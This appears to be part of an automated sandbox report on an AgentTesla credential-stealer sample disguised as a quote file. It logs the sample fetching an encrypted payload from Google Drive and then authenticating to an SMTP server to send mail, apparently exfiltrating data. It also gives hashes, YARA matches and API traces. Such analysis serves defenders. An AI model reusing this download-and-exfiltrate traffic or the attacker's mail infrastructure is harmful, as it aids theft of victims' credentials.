Nov 1, 2024 12:15:46.148291111 CET	587	49740	199.79.62.115	192.168.2.9
Nov 1, 2024 12:15:46.309142113 CET	587	49740	199.79.62.115	192.168.2.9
Nov 1, 2024 12:15:46.309415102 CET	49740	587	192.168.2.9	199.79.62.115
Nov 1, 2024 12:15:46.314287901 CET	587	49740	199.79.62.115	192.168.2.9
Nov 1, 2024 12:15:46.462965012 CET	587	49740	199.79.62.115	192.168.2.9
Nov 1, 2024 12:15:46.463841915 CET	49740	587	192.168.2.9	199.79.62.115
Nov 1, 2024 12:15:46.463897943 CET	49740	587	192.168.2.9	199.79.62.115
Nov 1, 2024 12:15:46.463920116 CET	49740	587	192.168.2.9	199.79.62.115
Nov 1, 2024 12:15:46.463938951 CET	49740	587	192.168.2.9	199.79.62.115
Nov 1, 2024 12:15:46.468921900 CET	587	49740	199.79.62.115	192.168.2.9
Nov 1, 2024 12:15:46.468960047 CET	587	49740	199.79.62.115	192.168.2.9
Nov 1, 2024 12:15:46.468969107 CET	587	49740	199.79.62.115	192.168.2.9
Nov 1, 2024 12:15:46.468976974 CET	587	49740	199.79.62.115	192.168.2.9
Nov 1, 2024 12:15:46.618818045 CET	587	49740	199.79.62.115	192.168.2.9
Nov 1, 2024 12:15:46.672813892 CET	49740	587	192.168.2.9	199.79.62.115

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2024 12:15:37.719043970 CET	50828	53	192.168.2.9	1.1.1.1
Nov 1, 2024 12:15:37.725857019 CET	53	50828	1.1.1.1	192.168.2.9
Nov 1, 2024 12:15:39.045264006 CET	53787	53	192.168.2.9	1.1.1.1
Nov 1, 2024 12:15:39.052170992 CET	53	53787	1.1.1.1	192.168.2.9
Nov 1, 2024 12:15:44.376378059 CET	52736	53	192.168.2.9	1.1.1.1
Nov 1, 2024 12:15:44.665628910 CET	53	52736	1.1.1.1	192.168.2.9

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 1, 2024 12:15:37.719043970 CET	192.168.2.9	1.1.1.1	0x288f	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 12:15:39.045264006 CET	192.168.2.9	1.1.1.1	0x9847	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Nov 1, 2024 12:15:44.376378059 CET	192.168.2.9	1.1.1.1	0x4b3d	Standard query (0)	mail.mbarieservicesltd.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 1, 2024 12:14:50.261038065 CET	1.1.1.1	192.168.2.9	0x552e	No error (0)	edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 12:14:50.261038065 CET	1.1.1.1	192.168.2.9	0x552e	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		84.201.210.22	A (IP address)	IN (0x0001)	false
Nov 1, 2024 12:14:50.261038065 CET	1.1.1.1	192.168.2.9	0x552e	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.26	A (IP address)	IN (0x0001)	false
Nov 1, 2024 12:14:50.261038065 CET	1.1.1.1	192.168.2.9	0x552e	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.21	A (IP address)	IN (0x0001)	false
Nov 1, 2024 12:14:50.261038065 CET	1.1.1.1	192.168.2.9	0x552e	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		84.201.210.39	A (IP address)	IN (0x0001)	false
Nov 1, 2024 12:14:50.261038065 CET	1.1.1.1	192.168.2.9	0x552e	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		217.20.57.41	A (IP address)	IN (0x0001)	false
Nov 1, 2024 12:14:50.261038065 CET	1.1.1.1	192.168.2.9	0x552e	No error (0)	default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com		84.201.210.35	A (IP address)	IN (0x0001)	false
Nov 1, 2024 12:15:37.725857019 CET	1.1.1.1	192.168.2.9	0x288f	No error (0)	drive.google.com		172.217.18.14	A (IP address)	IN (0x0001)	false
Nov 1, 2024 12:15:39.052170992 CET	1.1.1.1	192.168.2.9	0x9847	No error (0)	drive.usercontent.google.com		142.250.185.193	A (IP address)	IN (0x0001)	false
Nov 1, 2024 12:15:44.665628910 CET	1.1.1.1	192.168.2.9	0x4b3d	No error (0)	mail.mbarieservicesltd.com		199.79.62.115	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.9	49738	172.217.18.14	443	7888	C:\Users\user\Desktop\Quote_220072.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 11:15:38 UTC	216	OUT	GET /uc?export=download&id=1C0BaSrGvnMsoqpOj3YSAZc-ONgJtao7R HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Host: drive.google.com Cache-Control: no-cache
2024-11-01 11:15:39 UTC	1610	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Fri, 01 Nov 2024 11:15:38 GMT Location: https://drive.usercontent.google.com/download?id=1C0BaSrGvnMsoqpOj3YSAZc-ONgJtao7R&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'nonce-DXBv5wptBfS2EyRw6Z13bQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.9	49739	142.250.185.193	443	7888	C:\Users\user\Desktop\Quote_220072.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-01 11:15:39 UTC	258	OUT	GET /download?id=1C0BaSrGvnMsoqpOj3YSAZc-ONgJtao7R&export=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0 Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive
2024-11-01 11:15:42 UTC	4926	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Content-Security-Policy: sandbox Content-Security-Policy: default-src 'none' Content-Security-Policy: frame-ancestors 'none' X-Content-Security-Policy: sandbox Cross-Origin-Opener-Policy: same-origin Cross-Origin-Embedder-Policy: require-corp Cross-Origin-Resource-Policy: same-site X-Content-Type-Options: nosniff Content-Disposition: attachment; filename="YrPxinQpmxnkhhlvx179.bin" Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED] Access-Control-Allow-Methods: GET,HEAD,OPTIONS Accept-Ranges: bytes Content-Length: 168000 Last-Modified: Wed, 30 Oct 2024 08:26:14 GMT X-GUploader-UploadID: AHmUCY1Gdxgcb8xpLkAtczw5wJ6zXt5xVgfvFcvZG3H5tmMuEwZy6XOlQnyAF4uHC75QAr3z6coiiH3dpA Date: Fri, 01 Nov 2024 11:15:42 GMT Expires: Fri, 01 Nov 2024 11:15:42 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=ZBDanQ== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-01 11:15:42 UTC	4926	IN	Data Raw: 77 75 d4 fe 16 eb c6 c5 89 6a ec 51 7c 83 b6 f9 cd 2a 3c d8 d2 5c 27 2d 00 49 43 dc 0c c7 97 8c e1 2f 71 01 d2 4c 91 82 19 9e 33 71 bc 6d 93 4f c3 35 95 d9 00 43 f6 03 5c ad 4d 30 f4 bc 74 6a 6b 54 65 ef 4b 0f f2 95 a7 d4 f9 a5 07 ce ea 66 d6 b4 c5 c8 af d9 cb 51 30 48 29 93 3c f3 b8 bf 94 55 7f 52 21 18 f8 99 bd 7a 70 e6 16 3e 51 72 eb 7c de 9a fe a9 13 91 a8 93 65 0f dd ae e8 22 f0 f2 d7 81 1a 12 77 e6 b0 9c 55 17 93 8e 01 e7 54 49 45 1d 1f 1d 7d 5d 36 9f 28 9d 0a a8 e3 d1 01 97 06 19 aa ab a5 ef 0f e1 12 20 6c 0c ad 9c e0 b9 0d c9 6b 97 d4 75 c7 b1 42 9f 80 e9 5d a6 93 29 94 f0 d0 90 ce 3f ab e7 fa 25 61 f5 ba 9d d7 12 ec 07 50 55 9e 70 5a e3 96 1c 79 af b1 3b af 3a f9 71 ac 85 fa 97 5d 83 1c 75 65 29 73 a9 56 29 0e 15 4f e0 29 48 30 4f 48 2c 69 42 a2 Data Ascii: wujQ\|*<\'-IC/qL3qmO5C\M0tjkTeKfQ0H)<UR!zp>Qr\|e"wUTIE}]6( lkuB])?%aPUpZy;:q]ue)sV)O)H0OH,iB
2024-11-01 11:15:42 UTC	4846	IN	Data Raw: 44 dc b8 46 2a 52 fc b9 4d a6 eb 80 b7 3c a2 33 cb 7d a0 6e cd fe 62 43 a8 6a f0 13 df 47 45 e9 f1 3e 4b 68 ef 6f f0 0f a6 10 c5 de 68 d5 6b 4d f1 9d c8 cc 8c a2 f1 53 63 da 29 52 ed fb 7b 67 94 9d ab 36 09 34 06 40 b3 96 89 c3 8f bf 1c 7e 11 61 83 b4 31 43 c8 d3 ef 6d 78 d0 fc 9b 48 ae 49 2b 23 72 c2 fb ee a9 6e 64 96 83 d6 9e df c4 02 04 53 b6 ee e8 cc 59 fb d0 a1 18 99 1a 6f 84 9d 4b db 65 b3 1b 67 a5 73 4b b8 0f ee 63 1f 73 d7 07 80 3f 00 56 8d 78 7f a1 e0 1d cc e6 6f 8f 71 89 77 1c d7 c8 74 3c 44 6e db 2d 49 39 e1 db 77 b8 84 2b c3 2f e8 ae 19 28 90 ff 39 f3 9a 02 c0 7d 12 0a 02 dc 41 a1 6c 9d 72 09 08 e2 0d 1b c3 02 0e cc 04 37 1d eb 76 7f b4 c6 95 f9 48 e1 50 44 0c 41 cd 83 96 9d 91 fd ab 72 fb 89 25 28 df ff 5e 46 6e e0 6b e4 ee cb 24 5f d0 7c b7 Data Ascii: DF*RM<3}nbCjGE>KhohkMSc)R{g64@~a1CmxHI+#rndSYoKegsKcs?Vxoqwt<Dn-I9w+/(9}Alr7vHPDAr%(^Fnk$_\|
2024-11-01 11:15:42 UTC	1378	IN	Data Raw: cc f3 08 59 5f a9 0d 35 8c 31 23 76 33 30 cd 86 b1 ad 0d 90 64 9b 5f 43 69 6d 44 f8 3f a4 48 a5 7c fc d3 bb aa 71 79 98 ef ea 42 b1 2d ad 69 b4 39 80 7d fb 79 2d 43 14 14 56 45 0f 33 16 d5 22 37 6a c1 2d 65 a3 fc 04 04 f6 c7 58 44 dd d7 8b 9b 71 cd af 5e 90 21 c1 18 c8 63 15 1a 59 fe 89 3b d5 0b 38 86 52 36 bb 47 93 cb 01 d5 d8 35 36 ed 86 55 71 9a d7 b6 83 d8 b4 52 e5 75 12 ba 8c f3 53 1a 71 44 dc f1 df 1c 57 f0 e4 76 e6 61 39 78 85 a0 ad 30 5f af 9f 36 51 8c e6 a1 a1 1d 59 44 5b c0 a4 59 3e 84 a7 45 23 04 34 d8 23 46 de 71 81 2e cd 57 0f 75 60 0c 8e 03 e2 c0 4a 2b 8a 2b 23 ca 68 d2 6a 2b 3e 0a f9 cc 4e 60 79 c3 7c f5 42 7d 25 29 16 1a fd 1f 8c 83 6e 73 bb f6 90 e4 1f 82 03 c4 cd 08 e1 41 d7 88 f4 c8 81 5c cf 73 c7 fc 5f 97 ce f3 b0 5c 65 cb a4 16 dc 49 Data Ascii: Y_51#v30d_CimD?H\|qyB-i9}y-CVE3"7j-eXDq^!cY;8R6G56UqRuSqDWva9x0_6QYD[Y>E#4#Fq.Wu`J++#hj+>N`y\|B}%)nsA\s_\eI
2024-11-01 11:15:42 UTC	1378	IN	Data Raw: ff 5c e3 76 df e0 55 90 d7 f5 b0 5c 65 c7 89 67 1d 8c 00 ca a8 8d 82 e0 67 2c 49 3e 89 21 c1 f6 f0 a2 e4 3f c4 bf 7f 9f b7 ec 6f e1 10 75 91 a0 69 27 4f d8 d5 0e 35 d4 aa 1e 75 64 60 d9 93 40 fe 70 52 75 99 7e 4c 91 bc 3f f6 fc 27 00 40 68 3f a4 2b 3b b1 44 3e 26 15 b7 7c 4d a0 48 07 7c 31 4f 54 ee d6 f8 2b f9 52 5c 6c 56 ca b0 4f 0a 2c 6d 2d df 8f 7e e6 76 fe d1 6b c5 cf b5 97 5f 92 a7 41 83 aa 7c 6f a9 a5 f4 1e b3 90 1e 00 e2 a0 9b ca 2f 56 fa 40 48 f8 79 3a c9 86 8f 69 00 ae a2 7a 82 e9 30 b0 ad 03 a7 2e 55 06 6a 8a 4f 14 97 95 94 49 d7 76 3d 8e a4 98 b5 6f 4d 46 69 0e b4 81 3c de 05 61 78 a4 8c b7 98 31 e3 90 49 43 29 1b 99 b6 35 ec 4c 2f 82 3a c5 ef c9 36 62 06 a2 22 d3 c1 f0 62 9c 34 fc ea 26 7c 2e d6 76 2d d6 07 da 92 25 0d 14 83 26 40 15 03 33 eb Data Ascii: \vU\egg,I>!?oui'O5ud`@pRu~L?'@h?+;D>&\|MH\|1OT+R\lVO,m-~vk_A\|o/V@Hy:iz0.UjOIv=oMFi<ax1IC)5L/:6b"b4&\|.v-%&@3
2024-11-01 11:15:42 UTC	1378	IN	Data Raw: 16 82 74 2a cf 7d a4 93 09 09 32 86 61 23 29 2d 03 98 d3 cd fa 4b 73 29 9b 68 e1 e9 a7 da 28 74 0b 6b 46 01 70 dc 10 db 4b 12 17 42 1e 0a a7 19 37 29 77 b6 b5 c1 88 a3 a4 c7 2c 04 66 4f c9 c7 96 e0 13 bf 50 74 32 0a 54 9c cc d7 49 8d b8 a2 91 53 4b 0f 41 fc bd 26 04 e4 cc 68 8e 34 f6 9f fc a6 a7 f8 37 99 e6 6e b4 cf e8 fa 1f a8 6d 58 17 2b 93 3a 9c 39 bf 94 5f 6e 71 01 60 3e fa 81 52 2f e4 16 38 22 f2 eb 7c d4 ba f2 6f 70 ad 80 cc 67 0f 5b c1 69 22 fe e7 7c ac 3a 74 b9 48 ad 0c 0b 59 5e a9 26 0f 3d 3a 6f 4d 8b b5 79 13 7f ad 0a fe 6d a9 0c be 75 bd 75 5f aa 5a 17 e2 13 a0 23 02 28 45 8d 3c 8d d6 63 b8 2a 1b d9 7f e9 a0 61 8c 89 ff 4e ac fb b9 96 f0 9c 80 c5 ef d5 dd 46 47 49 db ba 9d dd 3a c3 07 b0 5f 8f 7a 43 ee b7 17 16 30 b3 3b a5 41 79 71 ac 8f 7b 80 Data Ascii: t}2a#)-Ks)h(tkFpKB7)w,fOPt2TISKA&h47nmX+:9_nq`>R/8"\|opg[i"\|:tHY^&=:oMymuu_Z#(E<caNFGI:_zC0;Ayq{
2024-11-01 11:15:42 UTC	1378	IN	Data Raw: 8b 62 55 e2 b7 18 6e d7 b2 17 ad 19 fb 5a 44 9a dc bf b4 27 1e 7f 45 a7 b7 ca 6a 01 51 17 4f e6 41 42 30 6f 42 26 76 5a 8a 98 1b 7b f7 f6 28 66 55 2b 64 da 5e 8a 7a 76 08 c4 95 c7 03 c8 de 11 ff 8d 4c c0 9d fa 41 55 22 82 18 4c 13 3f 70 9e 93 39 9c 5f 31 76 51 b2 08 35 b6 95 fe a2 17 84 a5 c3 b5 a7 0f a7 6c 33 6b 20 bd ee a8 e2 bc 5a de ff 08 be 1e 0e a1 db bd 0b 60 9a 6a 3e 34 dd f6 77 ac 1b 2a c0 8f d7 54 ed 0b f1 2d f9 72 09 56 35 f8 a5 49 dc b1 4e d2 44 2e b7 66 af c0 e9 bb 3c a8 4d d3 65 b3 6a c1 f5 69 5e 5f 71 37 8b f3 57 47 92 e0 4d 4a 6c e1 7b dd 1c a3 12 c6 56 73 d8 6d 2b 91 62 c9 e6 9e a7 ef 4f 67 49 15 73 29 b4 45 64 c9 b4 3d 1a 29 fb d0 13 8c be a4 c1 8f b9 0f 56 e7 71 95 bf 66 57 c9 d3 e9 7c 74 ce 13 9e fe 87 b5 95 23 4e ea a0 e6 b1 65 44 71 Data Ascii: bUnZD'EjQOAB0oB&vZ{(fU+d^zvLAU"L?p9_1vQ5l3k Z`j>4w*T-rV5IND.f<Meji^_q7WGMJl{Vsm+bOgIs)Ed=)VqfW\|t#NeDq
2024-11-01 11:15:42 UTC	1378	IN	Data Raw: 7c 74 e7 9e 58 07 9b 63 0f 42 72 c4 f6 8b 6d 62 64 99 8a 26 8d fd 2a 16 6f 30 b6 ef 83 dd 5e d3 d9 89 3c b2 10 7e 9a 9b 53 c6 b3 b9 37 61 a9 58 1a 91 77 de ff d5 43 76 04 ac 3d 17 5b bc d4 7f a8 f3 8c 6f ca 60 82 5a 73 49 1c d1 d1 07 3e 42 46 7a 21 53 3e f0 d5 49 92 84 07 c6 3c f7 ab 31 82 8c 01 32 ce 90 09 41 94 e7 1c 2a 83 50 91 69 8b 28 c4 09 e2 03 08 ca 02 11 c2 14 93 1c eb 70 6c b7 c0 61 d4 6c ef 43 35 00 c7 cd 87 96 5b 9f db 7c 68 14 85 1e 60 ce 8e 2c 4b 7f e8 ed 8a f9 9d db a0 04 64 a7 ef 2c 1f c2 10 28 a4 a8 d1 83 35 5e a8 2c ba 79 25 37 15 ab d3 51 9a 0f c8 42 4a f0 f9 23 14 43 af 14 cb 8d 68 2b 2b f0 19 94 87 b1 ab 16 98 64 9d 49 4b 9e 40 44 fa 44 df 48 fb 7a c3 b8 d3 aa 7b 71 a0 54 28 27 95 fb f3 47 b9 3d d3 96 fb 79 2f 06 45 16 2d c9 16 39 12 Data Ascii: \|tXcBrmbd&o0^<~S7aXwCv=[o`ZsI>BFz!S>I<12APi(plalC5[\|h`,Kd,(5^,y%7QBJ#Ch++dIK@DDHz{qT('G=y/E-9
2024-11-01 11:15:42 UTC	1378	IN	Data Raw: d3 bd 48 a8 35 61 15 fe 68 2d 3d 5e 34 31 8c 75 05 3e 8c 36 c9 6d c5 24 65 b4 fc 6b ae ec 39 53 7b d9 ed 8f df 6e e7 af 47 b3 2c d7 58 d8 5b 40 1a 59 fe 89 22 ce 30 ee 95 53 3e 43 57 b8 ad af c3 f0 65 25 e5 91 47 5b 88 12 c2 41 f1 c7 5e e7 08 06 14 8c f7 4f 61 e7 45 ca 05 c6 07 5f d6 f3 4b 84 71 1c 25 fc db ab 5f f5 c0 cf 3c 45 78 fe bd 5f 1a 2f 83 a1 ec a7 59 2e 9d b6 55 2a e8 1e b6 30 7c cd 48 a9 17 c4 4d 37 66 69 2c 20 03 e2 cb 66 01 8a 35 38 e8 3e 7c 6c 33 ca 7f dc cf 64 62 60 c9 6b e8 32 15 1e 0d 25 52 23 1f 8c 8b 04 05 b3 de 02 be 37 af 6c f1 cb 24 fc 54 cc 9a e5 86 6c 4f f2 62 d6 fa db fe fa 5c 48 2e 3a c8 8f 12 e4 87 11 c7 d6 f4 a3 db a2 50 55 1d d6 24 de e1 61 0d c8 31 c8 b8 e5 9f b7 eb 17 1d 35 75 97 be 68 3f 5e cc dc 13 e3 7a 86 10 79 8a d4 ca Data Ascii: H5ah-=^41u>6m$ek9S{nG,X[@Y"0S>CWe%G[A^OaE_Kq%_<Ex_/Y.U*0\|HM7fi, f58>\|l3db`k2%R#7l$TlOb\H.:PU$a15uh?^zy
2024-11-01 11:15:42 UTC	1378	IN	Data Raw: 0e b5 f4 83 53 73 4d df cc 2d c1 d5 86 1a 78 0e d6 d5 93 57 9d 1c ad 74 a6 ff 40 9a bc 2e fa d0 e1 80 6c 66 39 c6 61 2b b4 55 3e ca 15 b7 7c 41 8c 52 03 6a 2b 72 c5 72 fb f6 2b 99 e5 4d 68 41 a0 d8 21 97 2b 72 03 c7 87 68 ff 4a 51 d0 47 c1 e4 8f 8c 59 ba f0 2e f2 a1 51 29 a7 b8 d7 4f b4 8f 18 d3 d4 8a e6 bf 5d aa fc 53 47 86 01 2a cf ef ec 65 0b a8 b4 6c b2 10 5e e4 a2 05 d2 89 5c 17 64 8a 44 14 97 95 9a 62 de 5e a6 96 5a 9f f6 11 3f 36 6e 1f bb e4 a3 d5 05 6c bb 59 ab 45 95 26 95 06 11 50 2a 65 ed a6 31 85 c9 25 82 3b cd b9 09 58 b1 f7 5b 57 01 df e3 68 f3 54 f1 f3 de 62 12 d6 71 02 53 0e 24 99 25 08 08 e3 a4 40 04 09 47 64 d2 e7 90 cc 59 35 82 75 c2 d8 b0 04 b5 49 0f 3d 37 72 76 af 9a d1 53 0b 3b 6d c6 65 8d cf 69 07 73 b0 cd 53 84 a3 bf da 11 da bf a5 Data Ascii: SsM-xWt@.lf9a+U>\|ARj+rr+MhA!+rhJQGY.Q)O]SGel^\dDb^Z?6nlYE&Pe1%;X[WhTbqS$%@GdY5uI=7rvS;meisS
2024-11-01 11:15:42 UTC	1378	IN	Data Raw: 1a 69 9b 3b 79 2f 7c b7 d9 46 e7 6d ae d6 05 28 96 bd aa fb b4 b7 13 a9 54 89 db 65 9b 96 ec 31 e0 db 84 8a c4 5c 42 16 3e 12 6d 26 0e ff fc 4d d1 f4 b3 b7 c7 fc 7b f8 20 ef 4c 6e b4 c5 c9 bf d9 cb 51 70 77 29 d6 b8 f3 be be 94 55 7e 41 11 1a f8 db bd 7a 70 c3 16 3e 40 64 e0 57 ea 9a f9 be ed 90 84 99 67 0c 2e 7f e8 22 f4 e7 75 84 1a a1 66 d5 90 08 5d 5d 5a c0 87 8f 3d 30 7c 66 6d 75 0c d1 56 de 0b fe 7c cd 8d b9 6c 49 65 50 88 f2 d2 aa e5 8e 79 6f fb 43 fe b6 a7 88 6b 84 41 9a d9 75 e1 91 10 41 e3 d5 75 f9 c1 6c 92 d8 3b 91 cd 39 e8 c3 44 3d ea f5 ba 99 fd 30 ee 04 cd de 9c 71 55 c8 a6 07 49 2d b3 34 ad 32 f9 57 ac 85 eb 81 20 32 35 23 65 18 66 b1 a8 28 22 32 6f ad b7 2b 0c 47 17 2e 69 46 8a 3f 1b 7b f7 f6 38 7c 55 2b 64 da 5e 8a 7a 76 08 c4 95 c7 20 b4 Data Ascii: i;y/\|Fm(Te1\B>m&M{ LnQpw)U~Azp>@dWg."uf]]Z=0\|fmuV\|lIePyoCkAuAul;9D=0qUI-42W 25#ef("2o+G.iF?{8\|U+d^zv

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Nov 1, 2024 12:15:45.398843050 CET	587	49740	199.79.62.115	192.168.2.9	220-md-54.webhostbox.net ESMTP Exim 4.96.2 #2 Fri, 01 Nov 2024 16:45:45 +0530 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Nov 1, 2024 12:15:45.399593115 CET	49740	587	192.168.2.9	199.79.62.115	EHLO 035347
Nov 1, 2024 12:15:45.553205013 CET	587	49740	199.79.62.115	192.168.2.9	250-md-54.webhostbox.net Hello 035347 [173.254.250.82] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Nov 1, 2024 12:15:45.554178953 CET	49740	587	192.168.2.9	199.79.62.115	AUTH login c2FsZXNzQG1iYXJpZXNlcnZpY2VzbHRkLmNvbQ==
Nov 1, 2024 12:15:45.707318068 CET	587	49740	199.79.62.115	192.168.2.9	334 UGFzc3dvcmQ6
Nov 1, 2024 12:15:45.981354952 CET	587	49740	199.79.62.115	192.168.2.9	235 Authentication succeeded
Nov 1, 2024 12:15:45.981822968 CET	49740	587	192.168.2.9	199.79.62.115	MAIL FROM:<saless@mbarieservicesltd.com>
Nov 1, 2024 12:15:46.142847061 CET	587	49740	199.79.62.115	192.168.2.9	250 OK
Nov 1, 2024 12:15:46.143258095 CET	49740	587	192.168.2.9	199.79.62.115	RCPT TO:<iinfo@mbarieservicesltd.com>
Nov 1, 2024 12:15:46.309142113 CET	587	49740	199.79.62.115	192.168.2.9	250 Accepted
Nov 1, 2024 12:15:46.309415102 CET	49740	587	192.168.2.9	199.79.62.115	DATA
Nov 1, 2024 12:15:46.462965012 CET	587	49740	199.79.62.115	192.168.2.9	354 Enter message, ending with "." on a line by itself
Nov 1, 2024 12:15:46.463938951 CET	49740	587	192.168.2.9	199.79.62.115	.
Nov 1, 2024 12:15:46.618818045 CET	587	49740	199.79.62.115	192.168.2.9	250 OK id=1t6pd4-003nCJ-1F

Target ID:	0
Start time:	07:14:54
Start date:	01/11/2024
Path:	C:\Users\user\Desktop\Quote_220072.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Quote_220072.exe"
Imagebase:	0x400000
File size:	1'197'664 bytes
MD5 hash:	AC900546C8BF5B3BE3184502D0D2D7BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	07:15:26
Start date:	01/11/2024
Path:	C:\Users\user\Desktop\Quote_220072.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Quote_220072.exe"
Imagebase:	0x400000
File size:	1'197'664 bytes
MD5 hash:	AC900546C8BF5B3BE3184502D0D2D7BA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2585874253.00000000348FA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2585874253.00000000348A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2585874253.00000000348A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	30.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	16.5%
Total number of Nodes:	826
Total number of Limit Nodes:	19

Executed Functions

Function 004036DA Relevance: 84.4, APIs: 32, Strings: 16, Instructions: 416
stringfilecomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00008001), ref: 004036F6
GetVersionExW.KERNEL32(?), ref: 0040371F
GetVersionExW.KERNEL32(?), ref: 00403732
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004037DA
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403814
OleInitialize.OLE32(00000000), ref: 0040381B
SHGetFileInfoW.SHELL32(004085B0,00000000,?,000002B4,00000000), ref: 0040383A
GetCommandLineW.KERNEL32(007A7540,NSIS Error), ref: 0040384F
CharNextW.USER32(00000000,"C:\Users\user\Desktop\Quote_220072.exe",?,"C:\Users\user\Desktop\Quote_220072.exe",00000000), ref: 0040389B
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403999
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004039AA
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004039B6
